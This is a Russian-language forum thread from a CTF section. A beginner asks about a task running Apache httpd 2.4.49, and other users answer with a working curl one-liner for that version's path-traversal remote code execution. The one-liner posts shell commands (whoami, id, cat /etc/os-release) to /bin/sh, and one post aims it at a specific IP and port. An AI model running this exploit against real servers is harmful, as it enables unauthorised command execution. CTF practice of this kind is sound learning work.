ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Задания/Квесты/CTF/Конкурсы (https://forum.antichat.xyz/forumdisplay.php?f=112)
-   -   Таск Админ Художник? (https://forum.antichat.xyz/showthread.php?t=1642649)

Jacob Guitarrero 28.11.2023 19:06
Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен

Exited3n 28.11.2023 20:02
Цитата:

Jacob Guitarrero сказал(а):

Всем привет, начал свой путь в CTF и первым заданием выбрал Художник из раздела Администрирование
Пробовал в html коде искать флаг, но нет
Через nmap искал какая там уязвимость, пишет что CVE Apache httpd 2.4.49
С гитхаба скачал необходимое, но не получается
Может неправильно запускаю
Если ли есть райтап, был бы признателен
CVEшку не заюзать ?

Bash:


Код:
curl
'$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'

Jacob Guitarrero 28.11.2023 22:01
Цитата:

Exited3n сказал(а):

CVEшку не заюзать ?

Bash:


Код:
curl
'$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?

Exited3n 28.11.2023 22:30
Цитата:

Jacob Guitarrero сказал(а):

это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
Честно сказать даже не знаю что посоветовать.
Основы изучи, прям с азов рекомендую начать.
Начни с того что забей в поисковик - curl и почитай про данный инструмент, что делает, как запускается и т.д.

GoBL1n 29.11.2023 10:50
Цитата:

Jacob Guitarrero сказал(а):

это в адресную строку добавлять сайта ?
и что поизучать посоветуете, чтобы разбираться в подобных командах ?
судя по вопросу, найни с изучения Пингвина

P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))

Jacob Guitarrero 29.11.2023 18:38
Цитата:

GoBL1n сказал(а):

судя по вопросу, найни с изучения Пингвина

P.S. надеюсь ты догодаешься загуглить за пингвина, если не понял о чём я))
самое собой изучать его, но этого не достаточно для решения данной задачи

Exited3n 29.11.2023 22:25
Цитата:

Jacob Guitarrero сказал(а):

самое собой изучать его, но этого не достаточно для решения данной задачи
Серьезно ?
Код:
curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
И так, считаем утилиты - curl, echo, whoami, id, cat
Целых 5 штук! Причем база базой.

M4x 30.12.2024 01:47
Цитата:

Exited3n сказал(а):

curl '$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; whoami && id && cat /etc/os-release'
Можно и без Content-Type:

Bash:


Код:
curl
'62.173.140.174:10009/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
--data
'echo; whoami && id && cat /etc/os-release'


Время: 04:02